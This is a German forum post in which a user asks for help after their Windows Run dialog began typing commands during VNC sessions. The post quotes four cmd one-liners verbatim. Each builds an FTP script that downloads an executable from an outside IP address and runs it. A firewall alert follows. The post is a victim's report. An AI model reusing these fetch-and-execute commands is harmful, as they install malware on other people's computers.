während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus

taz

Hi Leute,

vorab meine Story, die übrigens die merkwürdigste ist, die ich je an meinem System beobachtete.

Ich wohne in Hamburg und mein Kumpel in Berlin brauchte Hilfe an seinem Rechner. Da mir Skype-Sessions, ohne seinen Desktop zu sehen, viel zu anstrengend sind, wollte ich mit ihm zusammen VNC installieren. Dabei stellte sich heraus, dass er genau wie ich hinter nem Router sitzt, folglich die Ports (5900 VNC-Client + 5800 für Browser(Java)-basierten Zugriff) zu forwarden sind. Das klappte letztlich bei mir, bei ihm leider nicht, da komischerweise Menupunkte in seinem Router nicht aktivierbar waren. Aber das ist eine andere Geschichte. Ich war mittlerweile heiß auf VNC geworden und richtete mir wieder einen DynDNS-Account ein, um auch von unterwegs (ich bin werktags in Köln) bei Bedarf via VNC an meinen Rechner zu kommen. Ich testete, ob mein Router die IP ordnungsgemäß weiterleitete, indem ich versuchte webbasiert auf meinen Rechner zu kommen. Das funktionierte dann auch gut. Den VNC-Server lies ich mit aktivem Passwort und der Einstellung, dass bei ner Verbindung das Hintergrundbild nicht mit übertragen wird, an.

Dann ging ich per Ausführen-Dialog (Windows+R) per regedit in meine Registry, wo ich einen Wert überprüfen wollte, der eigentlich den AV-Notifier in Vergangenheit zuverlässig blockte, aber seit neuestem eben nicht mehr. Der Wert stimmte, so schloss ich zumindest RegEdit. Der Ausführen-Dialog war vermutlich noch offen.

Dann startete ich MobileMaster (was ich erst kürzlich zuverlässig [via IR] zum Laufen brachte), um mein Handy mit meinem System zu synchronisieren. Dann dachte ich mir, lieber zuvor mal den Dateimanager von Nokia PCSuite zu checken und schloss den MobileMaster direkt wieder. Und jetzt kommts:

Nun ging mein Hintergrundbild weg, wurde grau. Mein Blick ging direkt aufs SysTray, wo gerade mein VNC-Tray von weiß auf schwarz wechselte. Das bedeutet normalerweise, dass sich jmd darauf eingelogged hat. Als wenn dies aufgrund des Passwortes nicht schon unmöglich genug ist, ging mein Blick nach unten links, wo sich gerade im Ausführen-Dialog wilde ewig lange Kommandos (sowas wie @echo, exit, blablabla) wie von Geisterhand eintrugen.

Ich schaltete aus Panik direkt meinen Rechner aus, da mir dies gewaltig suspekt vorkam.

Danach fiel mir ein, dass ich in meinem Browser noch nen Tab offen gehabt haben könnte, welcher versucht haben könnte auf <meinAcc>.dyndns.org:5800 zuzugreifen. Ich hatte ja zuvor (siehe oben) mehrmals versucht, das IP-Forwarding meines Routers an meinen DynDNS-Account zu testen. Da könnte eben noch ein Tab offen gewesen sein, der zuvor keine Verbindung zustande bringen konnte.
Wie auch immer: Ich testete, wann das VNC-Tray-Icon schwarz wird. Dies geschieht erst nachdem man mit dem Passwort Zugriff erhält. Ein simples <meinAcc>.dyndns.org:5800 [Enter] reicht also nicht, so dass meine Vermutung mit dem Tab eigentlich flach fällt. Wie ihr jedoch merkt, poste ich hier die gesamte Story, da ich mir überhaupt nicht mehr sicher bin.

Leider hatte ich keine weitere Zeit, mich darum zu kümmern, da ich (siehe oben) werktags in Köln arbeite und am Wochenende in Hamburg bin, wo auch mein Rechner steht. Am darauf folgenden Wochenende war ich dann im Westerwald bei meinen Ellis, um den Bday meiner Sister zu feiern. Meine Freundin (in Hamburg) brauchte jedoch dringend Nachhilfe in Mathe. Ich dachte mir, dass wir die Nachhilfe, wenn wir sie schon auf diese Distanz machen müssen, doch via VNC wunderbar mit Excel, Notepad und dem Formeleditor von Word zusammen an meinem Hamburger Rechner machen können. Gesagt getan, ich connectete und alles funktionierte recht gut. Während dieser VNC-Session passierte jedoch immer wieder Folgendes:

Der Ausführen-Dialog (Windows + R) öffnete sich selbständig und schrieb:

- Beim ersten Mal:
cmd /c echo OPEN 78.54.0.181 31839>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

- Beim zweiten Mal:
cmd /c echo OPEN 78.54.182.212 15531>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

- Beim dritten Mal:
cmd /c echo open 85.179.104.152 3609 >> i &echo user anfwen anfwen >> i &echo get msoft60412.exe >> i &echo quit >> i &ftp -nv -s:i &msoft60412.exe &exit

- Beim vierten Mal:
cmd /c echo open 85.179.104.152 3609 >> i &echo user ktfqfp ktfqfp >> i &echo get msoft32313.exe >> i &echo quit >> i &ftp -nv -s:i &msoft32313.exe &exit

Beim jedem Mal ging die Commando-Shell mit connect <ip> auf. Daraufhin meldete sich meine Firewall mit etwas in der Art des Folgenden (jedoch immer war ftp.exe darin enthalten):

Programm zur dateiübertr (ftp.exe) versucht eine verb herzust. [85.179.104.152] nutzt den remote-port 3609. möchten sie diesem programm den zugriff auf das netzwerk erlauben ?

Dateiversion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Dateibeschreibung : Programm zur Dateiübertragung (ftp.exe)
Dateipfad : C:\WINDOWS\system32\ftp.exe
Prozess-ID : DCC (Heximal) 3532 (Dezimal)

Verbindungsursprung : lokal initiert
Protokoll : TCP
Lokale Adresse : 192.168.0.78
Lokaler Port : 2396
Remote-Name :
Remote-Adresse : 85.179.104.152
Remote-Port : 3609

Ethernet-Paket-Details:
Ethernet II (Packet Length: 76)
Destination: 00-17-9a-59-3d-e3
Source: 00-e0-7d-8f-10-15
Type: IP (0x0800)
Internet Protocol
Version: 4
Header Length: 20 bytes
Flags:
.1.. = Don't fragment: Set
..0. = More fragments: Not set
Fragment offset:0
Time to live: 128
Protocol: 0x6 (TCP - Transmission Control Protocol)
Header checksum: 0xecd1 (Correct)
Source: 192.168.0.78
Destination: 85.179.104.152
Transmission Control Protocol (TCP)
Source port: 2396
Destination port: 3609
Sequence number: 2008314393
Acknowledgment number: 0
Header length: 28
Flags:
0... .... = Congestion Window Reduce (CWR): Not set
.0.. .... = ECN-Echo: Not set
..0. .... = Urgent: Not set
...0 .... = Acknowledgment: Not set
.... 0... = Push: Not set
.... .0.. = Reset: Not set
.... ..1. = Syn: Set
.... ...0 = Fin: Not set
Checksum: 0x9b02 (Correct)
Data (0 Bytes)

Binäres Abbild des Pakets:
0000: 00 17 9A 59 3D E3 00 E0 : 7D 8F 10 15 08 00 45 00 | ...Y=...}.....E.
0010: 00 30 A9 99 40 00 80 06 : D1 EC C0 A8 00 4E 55 B3 | .0..@........NU.
0020: 68 98 09 5C 0E 19 77 B4 : 72 19 00 00 00 00 70 02 | h..\..w.r.....p.
0030: FF FF 02 9B 00 00 02 04 : 05 B4 01 01 04 02 00 0C | ................
0040: 00 15 FF FF FF 11 00 3F : 3F 3F 3F 3F | .......?????

Diesen Dialog lies ich einfach stehen und dann ging die Windows-Commando-Shell irgendwann automatisch wieder zu. Meine Firewall hat hoffentlich Schlimmeres vermeiden können.

Mein System:
- WinXP 2002 SP2 + further patches
- AMD XP+ 3200 Barton
- 1 GB RAM
- Sygate Firewall 5.5 build 2364
- AntiVir (ständig up to date)
- SpyWareGuard
- TrojanCheck Guard mit aktivierter Prozeßüberwachung (Autostart lasse ich von anderem Tool ständig überwachen)
- SpyBot-SD Resident TeaTimer zur Autostart-Überwachung (im Zweifel gehe ich immer auf "nicht erlauben")
- Browser Firefox neueste Version
- Email Thunderbird neueste Version

So jetzt seid ihr daran, mir bitte zu sagen, was hier los ist. Ich mache mich schon mal daran einen HJT-Log zu erzeugen, um ihn hier im Anschluß zu posten.

Vielen Dank schonmal